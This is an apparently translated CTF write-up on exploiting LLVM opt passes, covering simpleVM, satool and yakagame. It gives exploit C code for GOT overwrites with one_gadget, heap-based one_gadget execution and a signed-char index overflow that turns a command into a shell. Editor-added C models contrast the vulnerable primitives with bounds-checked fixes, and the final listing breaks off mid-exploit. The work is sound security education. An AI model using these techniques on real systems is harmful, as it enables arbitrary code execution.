Getting started with LLVM pass pwn
For someone who has never learned C++ this is very unfriendly; it feels like going back to when I was learning Java (Java is awful): all the packages, functions, implementation classes, iterators, red-black trees and so on. Looks like it is worth setting aside some time to learn C++.
Environment
Honestly, setting up this environment took two days. I kept hitting the error `Error opening 'LLVMHello.so': LLVMHello.so: cannot open shared object file: No such file or directory`. The fix is simply to use an absolute path, or to set the environment variable in .bashrc or .zshrc:
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:.
But once this variable is set there is a problem: if the current directory contains any glibc .so file it gets loaded in preference, which produces `Segmentation fault (core dumped)` and basically no command works any more. This is a really nasty pitfall; I almost thought my Ubuntu was done for. No need to worry, though: we can wrap the variable in a command that can be switched on and off manually:
alias llvm-ld="export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:."
and
alias llvm-rd="unset LD_LIBRARY_PATH"
Now it can be used without worry.
Some commands
clang-8 -emit-llvm -S exp.c -o exp.ll    compile exp.c into the intermediate .ll file
./opt-8 -load ./VMPass.so -VMPass ./exp.ll    load the pass .so and run it on the .ll file (this is how the attack is triggered)
set args -load VMPass.so -VMPass exp.ll    set the arguments when debugging (in gdb)
llvm::Pass::preparePassManager    the breakpoint to set when starting to debug
How to find the pass name: alt+t and search for namespace
The encoding number of each instruction can be found in
/usr/include/llvm-xx/llvm/IR/Instruction.def
2021 RedHat Cup (红帽杯) simpleVM
Program analysis
Using alt+t, the overridden runOnFunction is found to be sub_6830.
This part checks whether the function name is o0o0o0o0.
Entering sub_6AC0: this part analyses the function's basic blocks.
Entering sub_6B80: this is where the functionality of each basic block is analysed and implemented.
This part is rather long, so I will not analyse it in detail; essentially it implements a VM.
The key class is the abstract class llvm::CallBase; understanding the methods below is basically enough to read the program's flow.
Function *getCalledFunction() const: returns the pointer to the called function. If the call is a direct call (CallInst) and the callee is known, it returns the callee's pointer; otherwise it returns nullptr.
bool isIndirectCall() const: checks whether the call is an indirect call, i.e. one whose target function is decided dynamically at run time rather than at compile time.
Value *getCalledValue() const: returns the called value of the call. For a direct call this is the called function pointer; for an indirect call it is the value used to compute the target function dynamically.
unsigned getNumArgOperands() const: returns the number of argument operands of the call instruction.
Value *getArgOperand(unsigned i) const: returns the value of the i-th argument of the call instruction.
void setArgOperand(unsigned i, Value *val): sets the i-th argument of the call instruction to the given val.
OperandBundleUse getOperandBundle(StringRef Name) const: returns the operand bundle with the given name. Operand bundles are groups of operands used to pass extra information.
void addOperandBundleUse(OperandBundleUse Bundle): adds an operand bundle to the call instruction.
The vulnerability is in load and store: these two functions give an arbitrary address read and write.
The attack is to modify the GOT entry of llvm::legacy::PassManager::~PassManager(). I saw many people modify free's GOT entry, but that did not work for me; then I found that winmt's method goes through: overwrite the GOT entry of llvm::legacy::PassManager::~PassManager() with a one_gadget.
llvm::legacy::PassManager::~PassManager() is called automatically when the lifetime of the llvm::legacy::PassManager object ends, to perform cleanup and release resources. During the object's destruction, all Pass objects owned by the pass manager are released automatically, ensuring resources are freed correctly.
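The following is an added example (editor's code, not the challenge binary's) that models the four primitives in C: `add` and `min` adjust a register, while `load` and `store` dereference register 1 as a raw pointer, exactly as described, with no check on where it points, which is what turns them into an arbitrary read and write. Beside the unchecked versions is a checked variant that confines the address to the VM's own memory window, the check a safe implementation of such a pass would need. The register count, the window size and all names are assumptions.

```c
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

/* Constructed model of the simpleVM primitives (add / min / load / store).
 * Register count, memory window and names are the editor's assumptions. */
#define VM_NREGS   4
#define VM_MEM_LEN 64

typedef struct {
    uint64_t reg[VM_NREGS];
    uint8_t  mem[VM_MEM_LEN];   /* the only memory the VM should ever touch */
} vm_t;

void vm_add(vm_t *vm, int r, uint64_t v) { vm->reg[r] += v; }
void vm_min(vm_t *vm, int r, uint64_t v) { vm->reg[r] -= v; }

/* Challenge semantics: reg[1] is used as a raw pointer with no check, so
 * load reads and store writes wherever the program steers it. */
void vm_load_unchecked(vm_t *vm)  { memcpy(&vm->reg[2], (void *)(uintptr_t)vm->reg[1], sizeof vm->reg[2]); }
void vm_store_unchecked(vm_t *vm) { memcpy((void *)(uintptr_t)vm->reg[1], &vm->reg[2], sizeof vm->reg[2]); }

/* Hardened variant: the 8-byte access must lie entirely inside vm->mem. */
static bool vm_addr_ok(const vm_t *vm, uint64_t addr)
{
    uint64_t base = (uint64_t)(uintptr_t)vm->mem;
    return addr >= base && addr <= base + VM_MEM_LEN - sizeof(uint64_t);
}
bool vm_load_checked(vm_t *vm)
{
    if (!vm_addr_ok(vm, vm->reg[1])) return false;
    memcpy(&vm->reg[2], (void *)(uintptr_t)vm->reg[1], sizeof vm->reg[2]);
    return true;
}
bool vm_store_checked(vm_t *vm)
{
    if (!vm_addr_ok(vm, vm->reg[1])) return false;
    memcpy((void *)(uintptr_t)vm->reg[1], &vm->reg[2], sizeof vm->reg[2]);
    return true;
}

/* With the unchecked primitives, a program that only adds to reg[1] can read
 * and overwrite a variable outside the VM (a local word standing in for a
 * GOT entry). Returns the value that variable holds afterwards. */
uint64_t demo_unchecked_overwrite(void)
{
    volatile uint64_t sensitive = 0x1111;
    vm_t vm;
    memset(&vm, 0, sizeof vm);
    vm_add(&vm, 1, (uint64_t)(uintptr_t)&sensitive);  /* point reg[1] at it   */
    vm_load_unchecked(&vm);                             /* reg[2] = 0x1111      */
    vm_add(&vm, 2, 0x2222);                             /* reg[2] = 0x3333      */
    vm_store_unchecked(&vm);                            /* write it back        */
    return sensitive;                                   /* 0x3333               */
}

/* The checked primitives refuse the address outside the window and accept
 * one inside it. Returns 1 when both behave as expected. */
int demo_checked(void)
{
    volatile uint64_t sensitive = 0x1111;
    vm_t vm;
    memset(&vm, 0, sizeof vm);
    vm_add(&vm, 1, (uint64_t)(uintptr_t)&sensitive);
    vm_add(&vm, 2, 0x3333);
    bool outside_refused = !vm_store_checked(&vm);
    vm.reg[1] = (uint64_t)(uintptr_t)vm.mem + 8;   /* steer into the window */
    vm_add(&vm, 2, 0x0e0e);                        /* reg[2] = 0x4141        */
    bool inside_ok = vm_store_checked(&vm);
    uint64_t readback;
    memcpy(&readback, vm.mem + 8, sizeof readback);
    return (outside_refused && inside_ok && readback == 0x4141 && sensitive == 0x1111) ? 1 : 0;
}
```

The checked versions keep the same register-level interface, so a pass author can add the window check without changing what the VM program looks like; the only difference is that an out-of-window address becomes a refused operation instead of a write to arbitrary memory.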
Debugging process
add(1, 0x77E100);
Effect: writes the data into the address designated by register 1.
load(1);
Effect: loads the value at the address held in register 1 into register 2.
min(2, 0x9a6d0);
Effect: subtracts 0x9a6d0 (free's offset) from the real address of free.
add(2, 0xe3afe);
Effect: this gives the real address of the one_gadget.
add(1, 0x870);
0x870 is the distance from free's GOT entry to llvm::legacy::PassManager::~PassManager()@got.plt.
store(1);
Effect: overwrites the value at llvm::legacy::PassManager::~PassManager()@got.plt with the one_gadget.
exp
```c
// clang-8 -emit-llvm -S exp.c -o exp.ll
void add(int num, long long val);
void min(int num, long long val);
void load(int num);
void store(int num);
void o0o0o0o0()
{
    add(1, 0x77E100); // GOT entry of free
    load(1);
    min(2, 0x9a6d0);  // subtract free's offset
    add(2, 0xe3afe);  // one_gadget
    add(1, 0x870);
    store(1);
}
// ./opt-8 -load ./VMPass.so -VMPass ./exp.ll
```
CISCN-2021 satool
Program analysis
Again, first find the overridden runOnFunction; because of little-endian byte order, the function name should be B4ckDo0r.
The main functions are save, takeaway, stealkey, fakekey and run, but only save, stealkey, fakekey and run are used.
save
Allocates a 0x20 chunk; it takes two parameters.
stealkey
Copies the value in the allocated chunk into key.
fakekey
Adds fakekey's parameter to the number stored in the chunk's first eight bytes and writes the result back into the chunk.
run
Executes the data in the chunk.
Attack idea
Since there is the run vulnerability, I try to get a one_gadget into the chunk.
There is a heap involved, so let's look at the state of the bins at the start.
We can see that on the second chunk request the allocation comes from the unsorted bin. Combining this with what stealkey and fakekey do, we only need to pass an empty first parameter the second time save is used, then use stealkey to put (main_arena+96) into key; in fakekey, with the offset computed correctly, the chunk can be made to contain a one_gadget.
exp
```c
void save(char *a, char *b);
void stealkey();
void fakekey(long long x);
void run();
void B4ckDo0r()
{
    save("trunk", "trunk");
    save("", "trunk");
    stealkey();
    fakekey(-0x1ecbf0+0xe3afe);
    run();
}
```
QWB (强网杯) 2022 yakagame
Program analysis
In this challenge the overridden runOnFunction is sub_C880 and the pass name is ayaka.
From the analysis it is clear this challenge was written by a Genshin Impact player.
fight function
This looks like the process of attacking a boss: score is obtained from the difference between the damage and the boss's HP, and the check is whether score is greater than 0x12345678. The assignment to score is `v53 = weaponlist[v54]; *score = v53 - boss;`, but reaching that value is obviously impossible because the weaponlist array is of type char.
merge (unimportant)
Adds one weapon's damage onto another weapon.
destroy (unimportant)
Sets the chosen weapon's damage to zero.
upgrade (unimportant)
Adds a value to the damage of every weapon.
Four operations on cmd
cmd can be modified with add, subtract and XOR, turning the original bytes
0x92, 0x68, 0x7B, 0x27, 0x6D, 0x93, 0x68, 0x66
into the ASCII of `cat flag`.
else (very important)
Since I had not learned C++ before and this part mixes red-black trees and iterators in a long series of operations, I understood almost nothing while analysing it, and only after a long debugging session did I work out the rough flow (my wording may be imprecise, please bear with me).
It pairs every function not among the ones above with its argument as a key-value pair. On the first pairing it cannot enter
if ( (std::operator==<char>(v22, v58) & 1) != 0 )
; only when the same function name appears a second time does it enter, and in
weaponlist[v33] = *(_BYTE *)(v24 + 0x20);
v24 is the argument from the function's first appearance; the argument of the second appearance has no effect. This assignment has a vulnerability: v33 is of type char, and cmd and score sit right before the weaponlist array in memory (at lower addresses), so we can use the char integer overflow to modify score and cmd.
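As an added example (editor's C model, not the challenge's code), here is the signed-char index problem in isolation. `cmd` and `score` are placed just before `weaponlist` in a struct, with the distances chosen by the editor so that index 232 lands on `cmd[0]`, the byte the exploit's `trunk232(0xad)` call writes. The vulnerable setter takes a `signed char` index like the decompiled `weaponlist[v33]`; the fixed one takes an unsigned index and range-checks it. The struct layout, the names and the exact offsets are assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Constructed layout: cmd 24 bytes before weaponlist, score 16 bytes before it,
 * so signed-char indices 232..239 (-24..-17) reach cmd and 240..247 reach score.
 * The real binary's distances may differ; this is the editor's model. */
struct game_state {
    unsigned char cmd[8];        /* bytes the game later turns into a command */
    uint64_t      score;
    uint64_t      spare;         /* padding so the offsets above hold */
    unsigned char weaponlist[256];
};

/* Vulnerable pattern: weaponlist[v33] with v33 a (signed) char. Values 128..255
 * arrive as -128..-1 and the write lands before the array. Done through a byte
 * pointer into the struct so the model itself stays defined behaviour in C. */
void set_weapon_vuln(struct game_state *g, signed char idx, unsigned char val)
{
    unsigned char *weapons = (unsigned char *)g + offsetof(struct game_state, weaponlist);
    weapons[idx] = val;          /* idx may be negative here */
}

/* Fixed pattern: index widened to unsigned and range-checked. Returns 1 on success. */
int set_weapon_fixed(struct game_state *g, unsigned idx, unsigned char val)
{
    if (idx >= sizeof g->weaponlist) return 0;
    g->weaponlist[idx] = val;
    return 1;
}

/* 232 converted to signed char is -24 on x86-64 (two's complement wraparound),
 * so the write hits cmd[0]. Returns the value cmd[0] holds afterwards. */
int demo_vuln_hits_cmd(void)
{
    struct game_state g;
    memset(&g, 0, sizeof g);
    set_weapon_vuln(&g, (signed char)232, 0xad);
    return g.cmd[0];             /* 0xad: the write left the array */
}

/* The same call through the fixed setter stays inside the array. Returns 1 if
 * cmd and score are untouched and weaponlist[232] received the byte. */
int demo_fixed_stays_inside(void)
{
    struct game_state g;
    memset(&g, 0, sizeof g);
    int ok = set_weapon_fixed(&g, 232, 0xad);
    return (ok && g.cmd[0] == 0 && g.score == 0 && g.weaponlist[232] == 0xad) ? 1 : 0;
}
```

The important property of the fix is not only the bounds check but the type of the index: once it is `unsigned`, the values 128..255 that the game accepts as weapon numbers address real array slots instead of wrapping to negative offsets.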
exp
There are actually two approaches: one uses the four given operations to obtain `cat flag`; the other modifies cmd directly so that it points to `sh`.
First approach: modify cmd directly
void fight(int weapon){return;}
void trunk000(int x){return;}
void trunk001(int x){return;}
void trunk002(int x){return;}
void trunk003(int x){return;}
void trunk004(int x){return;}
void trunk005(int x){return;}
void trunk006(int x){return;}
void trunk007(int x){return;}
void trunk008(int x){return;}
void trunk009(int x){return;}
void trunk010(int x){return;}
void trunk011(int x){return;}
void trunk012(int x){return;}
void trunk013(int x){return;}
void trunk014(int x){return;}
void trunk015(int x){return;}
void trunk016(int x){return;}
void trunk017(int x){return;}
void trunk018(int x){return;}
void trunk019(int x){return;}
void trunk020(int x){return;}
void trunk021(int x){return;}
void trunk022(int x){return;}
void trunk023(int x){return;}
void trunk024(int x){return;}
void trunk025(int x){return;}
void trunk026(int x){return;}
void trunk027(int x){return;}
void trunk028(int x){return;}
void trunk029(int x){return;}
void trunk030(int x){return;}
void trunk031(int x){return;}
void trunk032(int x){return;}
void trunk033(int x){return;}
void trunk034(int x){return;}
void trunk035(int x){return;}
void trunk036(int x){return;}
void trunk037(int x){return;}
void trunk038(int x){return;}
void trunk039(int x){return;}
void trunk040(int x){return;}
void trunk041(int x){return;}
void trunk042(int x){return;}
void trunk043(int x){return;}
void trunk044(int x){return;}
void trunk045(int x){return;}
void trunk046(int x){return;}
void trunk047(int x){return;}
void trunk048(int x){return;}
void trunk049(int x){return;}
void trunk050(int x){return;}
void trunk051(int x){return;}
void trunk052(int x){return;}
void trunk053(int x){return;}
void trunk054(int x){return;}
void trunk055(int x){return;}
void trunk056(int x){return;}
void trunk057(int x){return;}
void trunk058(int x){return;}
void trunk059(int x){return;}
void trunk060(int x){return;}
void trunk061(int x){return;}
void trunk062(int x){return;}
void trunk063(int x){return;}
void trunk064(int x){return;}
void trunk065(int x){return;}
void trunk066(int x){return;}
void trunk067(int x){return;}
void trunk068(int x){return;}
void trunk069(int x){return;}
void trunk070(int x){return;}
void trunk071(int x){return;}
void trunk072(int x){return;}
void trunk073(int x){return;}
void trunk074(int x){return;}
void trunk075(int x){return;}
void trunk076(int x){return;}
void trunk077(int x){return;}
void trunk078(int x){return;}
void trunk079(int x){return;}
void trunk080(int x){return;}
void trunk081(int x){return;}
void trunk082(int x){return;}
void trunk083(int x){return;}
void trunk084(int x){return;}
void trunk085(int x){return;}
void trunk086(int x){return;}
void trunk087(int x){return;}
void trunk088(int x){return;}
void trunk089(int x){return;}
void trunk090(int x){return;}
void trunk091(int x){return;}
void trunk092(int x){return;}
void trunk093(int x){return;}
void trunk094(int x){return;}
void trunk095(int x){return;}
void trunk096(int x){return;}
void trunk097(int x){return;}
void trunk098(int x){return;}
void trunk099(int x){return;}
void trunk100(int x){return;}
void trunk101(int x){return;}
void trunk102(int x){return;}
void trunk103(int x){return;}
void trunk104(int x){return;}
void trunk105(int x){return;}
void trunk106(int x){return;}
void trunk107(int x){return;}
void trunk108(int x){return;}
void trunk109(int x){return;}
void trunk110(int x){return;}
void trunk111(int x){return;}
void trunk112(int x){return;}
void trunk113(int x){return;}
void trunk114(int x){return;}
void trunk115(int x){return;}
void trunk116(int x){return;}
void trunk117(int x){return;}
void trunk118(int x){return;}
void trunk119(int x){return;}
void trunk120(int x){return;}
void trunk121(int x){return;}
void trunk122(int x){return;}
void trunk123(int x){return;}
void trunk124(int x){return;}
void trunk125(int x){return;}
void trunk126(int x){return;}
void trunk127(int x){return;}
void trunk128(int x){return;}
void trunk129(int x){return;}
void trunk130(int x){return;}
void trunk131(int x){return;}
void trunk132(int x){return;}
void trunk133(int x){return;}
void trunk134(int x){return;}
void trunk135(int x){return;}
void trunk136(int x){return;}
void trunk137(int x){return;}
void trunk138(int x){return;}
void trunk139(int x){return;}
void trunk140(int x){return;}
void trunk141(int x){return;}
void trunk142(int x){return;}
void trunk143(int x){return;}
void trunk144(int x){return;}
void trunk145(int x){return;}
void trunk146(int x){return;}
void trunk147(int x){return;}
void trunk148(int x){return;}
void trunk149(int x){return;}
void trunk150(int x){return;}
void trunk151(int x){return;}
void trunk152(int x){return;}
void trunk153(int x){return;}
void trunk154(int x){return;}
void trunk155(int x){return;}
void trunk156(int x){return;}
void trunk157(int x){return;}
void trunk158(int x){return;}
void trunk159(int x){return;}
void trunk160(int x){return;}
void trunk161(int x){return;}
void trunk162(int x){return;}
void trunk163(int x){return;}
void trunk164(int x){return;}
void trunk165(int x){return;}
void trunk166(int x){return;}
void trunk167(int x){return;}
void trunk168(int x){return;}
void trunk169(int x){return;}
void trunk170(int x){return;}
void trunk171(int x){return;}
void trunk172(int x){return;}
void trunk173(int x){return;}
void trunk174(int x){return;}
void trunk175(int x){return;}
void trunk176(int x){return;}
void trunk177(int x){return;}
void trunk178(int x){return;}
void trunk179(int x){return;}
void trunk180(int x){return;}
void trunk181(int x){return;}
void trunk182(int x){return;}
void trunk183(int x){return;}
void trunk184(int x){return;}
void trunk185(int x){return;}
void trunk186(int x){return;}
void trunk187(int x){return;}
void trunk188(int x){return;}
void trunk189(int x){return;}
void trunk190(int x){return;}
void trunk191(int x){return;}
void trunk192(int x){return;}
void trunk193(int x){return;}
void trunk194(int x){return;}
void trunk195(int x){return;}
void trunk196(int x){return;}
void trunk197(int x){return;}
void trunk198(int x){return;}
void trunk199(int x){return;}
void trunk200(int x){return;}
void trunk201(int x){return;}
void trunk202(int x){return;}
void trunk203(int x){return;}
void trunk204(int x){return;}
void trunk205(int x){return;}
void trunk206(int x){return;}
void trunk207(int x){return;}
void trunk208(int x){return;}
void trunk209(int x){return;}
void trunk210(int x){return;}
void trunk211(int x){return;}
void trunk212(int x){return;}
void trunk213(int x){return;}
void trunk214(int x){return;}
void trunk215(int x){return;}
void trunk216(int x){return;}
void trunk217(int x){return;}
void trunk218(int x){return;}
void trunk219(int x){return;}
void trunk220(int x){return;}
void trunk221(int x){return;}
void trunk222(int x){return;}
void trunk223(int x){return;}
void trunk224(int x){return;}
void trunk225(int x){return;}
void trunk226(int x){return;}
void trunk227(int x){return;}
void trunk228(int x){return;}
void trunk229(int x){return;}
void trunk230(int x){return;}
void trunk231(int x){return;}
void trunk232(int x){return;}
void trunk233(int x){return;}
void trunk234(int x){return;}
void trunk235(int x){return;}
void trunk236(int x){return;}
void trunk237(int x){return;}
void trunk238(int x){return;}
void trunk239(int x){return;}
void trunk240(int x){return;}
void trunk241(int x){return;}
void trunk242(int x){return;}
void trunk243(int x){return;}
void trunk244(int x){return;}
void trunk245(int x){return;}
void trunk246(int x){return;}
void trunk247(int x){return;}
void trunk248(int x){return;}
void trunk249(int x){return;}
void trunk250(int x){return;}
void trunk251(int x){return;}
void trunk252(int x){return;}
void trunk253(int x){return;}
void trunk254(int x){return;}
void trunk255(int x){return;}
void gamestart()
{
trunk000(0);
trunk001(0);
trunk002(0);
trunk003(0);
trunk004(0);
trunk005(0);
trunk006(0);
trunk007(0);
trunk008(0);
trunk009(0);
trunk010(0);
trunk011(0);
trunk012(0);
trunk013(0);
trunk014(0);
trunk015(0);
trunk016(0);
trunk017(0);
trunk018(0);
trunk019(0);
trunk020(0);
trunk021(0);
trunk022(0);
trunk023(0);
trunk024(0);
trunk025(0);
trunk026(0);
trunk027(0);
trunk028(0);
trunk029(0);
trunk030(0);
trunk031(0);
trunk032(0);
trunk033(0);
trunk034(0);
trunk035(0);
trunk036(0);
trunk037(0);
trunk038(0);
trunk039(0);
trunk040(0);
trunk041(0);
trunk042(0);
trunk043(0);
trunk044(0);
trunk045(0);
trunk046(0);
trunk047(0);
trunk048(0);
trunk049(0);
trunk050(0);
trunk051(0);
trunk052(0);
trunk053(0);
trunk054(0);
trunk055(0);
trunk056(0);
trunk057(0);
trunk058(0);
trunk059(0);
trunk060(0);
trunk061(0);
trunk062(0);
trunk063(0);
trunk064(0);
trunk065(0);
trunk066(0);
trunk067(0);
trunk068(0);
trunk069(0);
trunk070(0);
trunk071(0);
trunk072(0);
trunk073(0);
trunk074(0);
trunk075(0);
trunk076(0);
trunk077(0);
trunk078(0);
trunk079(0);
trunk080(0);
trunk081(0);
trunk082(0);
trunk083(0);
trunk084(0);
trunk085(0);
trunk086(0);
trunk087(0);
trunk088(0);
trunk089(0);
trunk090(0);
trunk091(0);
trunk092(0);
trunk093(0);
trunk094(0);
trunk095(0);
trunk096(0);
trunk097(0);
trunk098(0);
trunk099(0);
trunk100(0);
trunk101(0);
trunk102(0);
trunk103(0);
trunk104(0);
trunk105(0);
trunk106(0);
trunk107(0);
trunk108(0);
trunk109(0);
trunk110(0);
trunk111(0);
trunk112(0);
trunk113(0);
trunk114(0);
trunk115(0);
trunk116(0);
trunk117(0);
trunk118(0);
trunk119(0);
trunk120(0);
trunk121(0);
trunk122(0);
trunk123(0);
trunk124(0);
trunk125(0);
trunk126(0);
trunk127(0);
trunk128(0);
trunk129(0);
trunk130(0);
trunk131(0);
trunk132(0);
trunk133(0);
trunk134(0);
trunk135(0);
trunk136(0);
trunk137(0);
trunk138(0);
trunk139(0);
trunk140(0);
trunk141(0);
trunk142(0);
trunk143(0);
trunk144(0);
trunk145(0);
trunk146(0);
trunk147(0);
trunk148(0);
trunk149(0);
trunk150(0);
trunk151(0);
trunk152(0);
trunk153(0);
trunk154(0);
trunk155(0);
trunk156(0);
trunk157(0);
trunk158(0);
trunk159(0);
trunk160(0);
trunk161(0);
trunk162(0);
trunk163(0);
trunk164(0);
trunk165(0);
trunk166(0);
trunk167(0);
trunk168(0);
trunk169(0);
trunk170(0);
trunk171(0);
trunk172(0);
trunk173(0);
trunk174(0);
trunk175(0);
trunk176(0);
trunk177(0);
trunk178(0);
trunk179(0);
trunk180(0);
trunk181(0);
trunk182(0);
trunk183(0);
trunk184(0);
trunk185(0);
trunk186(0);
trunk187(0);
trunk188(0);
trunk189(0);
trunk190(0);
trunk191(0);
trunk192(0);
trunk193(0);
trunk194(0);
trunk195(0);
trunk196(0);
trunk197(0);
trunk198(0);
trunk199(0);
trunk200(0);
trunk201(0);
trunk202(0);
trunk203(0);
trunk204(0);
trunk205(0);
trunk206(0);
trunk207(0);
trunk208(0);
trunk209(0);
trunk210(0);
trunk211(0);
trunk212(0);
trunk213(0);
trunk214(0);
trunk215(0);
trunk216(0);
trunk217(0);
trunk218(0);
trunk219(0);
trunk220(0);
trunk221(0);
trunk222(0);
trunk223(0);
trunk224(0);
trunk225(0);
trunk226(0);
trunk227(0);
trunk228(0);
trunk229(0);
trunk230(0);
trunk231(0);
// overwrite cmd with 0x6EFDAD (sh)
trunk232(0xad);
trunk233(0xfd);
trunk234(0x6e);
trunk235(0);
trunk236(0);
trunk237(0);
trunk238(0);
trunk239(0);
trunk240(0);
// overwrite score
trunk241(0);
trunk242(0x40);
trunk243(0);
trunk244(0);
trunk245(0);
trunk246(0);
trunk247(0);
trunk248(0);
trunk249(0);
trunk250(0);
trunk251(0);
trunk252(0);
trunk253(0);
trunk254(0);
trunk255(0);
trunk232(0xad);
trunk233(0xfd);
trunk234(0x6e);
trunk235(0);
trunk241(0);
trunk242(0);
trunk243(0);
trunk244(0);
fight(0);
}
Second approach
Turn
0x92, 0x68, 0x7B, 0x27, 0x6D, 0x93, 0x68,
through the operations into 0x63 0x61 0x74 0x20 0x66 0x6C 0x61 0x67.
This noob planned to write a brute-force script for it, but it turned out not to work.
I saw that C0Lin obtained it with the following sequence:
tiandongwanxiang();
wuxiangdeyidao();
zhanjinniuza();
guobapenhuo();
tiandongwanxiang();
tiandongwanxiang();
tiandongwanxiang();
tiandongwanxiang();
tiandongwanxiang();
tiandongwanxiang();
tiandongwanxiang();
tiandongwanxiang();
tiandongwanxiang();
wuxiangdeyidao();
zhanjinniuza();
void fight(int weapon){return;}
void wuxiangdeyidao(){return;}
void zhanjinniuza(){return;}
void guobapenhuo(){return;}
void tiandongwanxiang(){return;}
void upgrade(int val){return;}
void trunk000(int x){return;}
void trunk001(int x){return;}
void trunk002(int x){return;}
void trunk003(int x){return;}
void trunk004(int x){return;}
void trunk005(int x){return;}
void trunk006(int x){return;}
void trunk007(int x){return;}
void trunk008(int x){return;}
void trunk009(int x){return;}
void trunk010(int x){return;}
void trunk011(int x){return;}
void trunk012(int x){return;}
void trunk013(int x){return;}
void trunk014(int x){return;}
void trunk015(int x){return;}
void trunk016(int x){return;}
void trunk017(int x){return;}
void trunk018(int x){return;}
void trunk019(int x){return;}
void trunk020(int x){return;}
void trunk021(int x){return;}
void trunk022(int x){return;}
void trunk023(int x){return;}
void trunk024(int x){return;}
void trunk025(int x){return;}
void trunk026(int x){return;}
void trunk027(int x){return;}
void trunk028(int x){return;}
void trunk029(int x){return;}
void trunk030(int x){return;}
void trunk031(int x){return;}
void trunk032(int x){return;}
void trunk033(int x){return;}
void trunk034(int x){return;}
void trunk035(int x){return;}
void trunk036(int x){return;}
void trunk037(int x){return;}
void trunk038(int x){return;}
void trunk039(int x){return;}
void trunk040(int x){return;}
void trunk041(int x){return;}
void trunk042(int x){return;}
void trunk043(int x){return;}
void trunk044(int x){return;}
void trunk045(int x){return;}
void trunk046(int x){return;}
void trunk047(int x){return;}
void trunk048(int x){return;}
void trunk049(int x){return;}
void trunk050(int x){return;}
void trunk051(int x){return;}
void trunk052(int x){return;}
void trunk053(int x){return;}
void trunk054(int x){return;}
void trunk055(int x){return;}
void trunk056(int x){return;}
void trunk057(int x){return;}
void trunk058(int x){return;}
void trunk059(int x){return;}
void trunk060(int x){return;}
void trunk061(int x){return;}
void trunk062(int x){return;}
void trunk063(int x){return;}
void trunk064(int x){return;}
void trunk065(int x){return;}
void trunk066(int x){return;}
void trunk067(int x){return;}
void trunk068(int x){return;}
void trunk069(int x){return;}
void trunk070(int x){return;}
void trunk071(int x){return;}
void trunk072(int x){return;}
void trunk073(int x){return;}
void trunk074(int x){return;}
void trunk075(int x){return;}
void trunk076(int x){return;}
void trunk077(int x){return;}
void trunk078(int x){return;}
void trunk079(int x){return;}
void trunk080(int x){return;}
void trunk081(int x){return;}
void trunk082(int x){return;}
void trunk083(int x){return;}
void trunk084(int x){return;}
void trunk085(int x){return;}
void trunk086(int x){return;}
void trunk087(int x){return;}
void trunk088(int x){return;}
void trunk089(int x){return;}
void trunk090(int x){return;}
void trunk091(int x){return;}
void trunk092(int x){return;}
void trunk093(int x){return;}
void trunk094(int x){return;}
void trunk095(int x){return;}
void trunk096(int x){return;}
void trunk097(int x){return;}
void trunk098(int x){return;}
void trunk099(int x){return;}
void trunk100(int x){return;}
void trunk101(int x){return;}
void trunk102(int x){return;}
void trunk103(int x){return;}
void trunk104(int x){return;}
void trunk105(int x){return;}
void trunk106(int x){return;}
void trunk107(int x){return;}
void trunk108(int x){return;}
void trunk109(int x){return;}
void trunk110(int x){return;}
void trunk111(int x){return;}
void trunk112(int x){return;}
void trunk113(int x){return;}
void trunk114(int x){return;}
void trunk115(int x){return;}
void trunk116(int x){return;}
void trunk117(int x){return;}
void trunk118(int x){return;}
void trunk119(int x){return;}
void trunk120(int x){return;}
void trunk121(int x){return;}
void trunk122(int x){return;}
void trunk123(int x){return;}
void trunk124(int x){return;}
void trunk125(int x){return;}
void trunk126(int x){return;}
void trunk127(int x){return;}
void trunk128(int x){return;}
void trunk129(int x){return;}
void trunk130(int x){return;}
void trunk131(int x){return;}
void trunk132(int x){return;}
void trunk133(int x){return;}
void trunk134(int x){return;}
void trunk135(int x){return;}
void trunk136(int x){return;}
void trunk137(int x){return;}
void trunk138(int x){return;}
void trunk139(int x){return;}
void trunk140(int x){return;}
void trunk141(int x){return;}
void trunk142(int x){return;}
void trunk143(int x){return;}
void trunk144(int x){return;}
void trunk145(int x){return;}
void trunk146(int x){return;}
void trunk147(int x){return;}
void trunk148(int x){return;}
void trunk149(int x){return;}
void trunk150(int x){return;}
void trunk151(int x){return;}
void trunk152(int x){return;}
void trunk153(int x){return;}
void trunk154(int x){return;}
void trunk155(int x){return;}
void trunk156(int x){return;}
void trunk157(int x){return;}
void trunk158(int x){return;}
void trunk159(int x){return;}
void trunk160(int x){return;}
void trunk161(int x){return;}
void trunk162(int x){return;}
void trunk163(int x){return;}
void trunk164(int x){return;}
void trunk165(int x){return;}
void trunk166(int x){return;}
void trunk167(int x){return;}
void trunk168(int x){return;}
void trunk169(int x){return;}
void trunk170(int x){return;}
void trunk171(int x){return;}
void trunk172(int x){return;}
void trunk173(int x){return;}
void trunk174(int x){return;}
void trunk175(int x){return;}
void trunk176(int x){return;}
void trunk177(int x){return;}
void trunk178(int x){return;}
void trunk179(int x){return;}
void trunk180(int x){return;}
void trunk181(int x){return;}
void trunk182(int x){return;}
void trunk183(int x){return;}
void trunk184(int x){return;}
void trunk185(int x){return;}
void trunk186(int x){return;}
void trunk187(int x){return;}
void trunk188(int x){return;}
void trunk189(int x){return;}
void trunk190(int x){return;}
void trunk191(int x){return;}
void trunk192(int x){return;}
void trunk193(int x){return;}
void trunk194(int x){return;}
void trunk195(int x){return;}
void trunk196(int x){return;}
void trunk197(int x){return;}
void trunk198(int x){return;}
void trunk199(int x){return;}
void trunk200(int x){return;}
void trunk201(int x){return;}
void trunk202(int x){return;}
void trunk203(int x){return;}
void trunk204(int x){return;}
void trunk205(int x){return;}
void trunk206(int x){return;}
void trunk207(int x){return;}
void trunk208(int x){return;}
void trunk209(int x){return;}
void trunk210(int x){return;}
void trunk211(int x){return;}
void trunk212(int x){return;}
void trunk213(int x){return;}
void trunk214(int x){return;}
void trunk215(int x){return;}
void trunk216(int x){return;}
void trunk217(int x){return;}
void trunk218(int x){return;}
void trunk219(int x){return;}
void trunk220(int x){return;}
void trunk221(int x){return;}
void trunk222(int x){return;}
void trunk223(int x){return;}
void trunk224(int x){return;}
void trunk225(int x){return;}
void trunk226(int x){return;}
void trunk227(int x){return;}
void trunk228(int x){return;}
void trunk229(int x){return;}
void trunk230(int x){return;}
void trunk231(int x){return;}
void trunk232(int x){return;}
void trunk233(int x){return;}
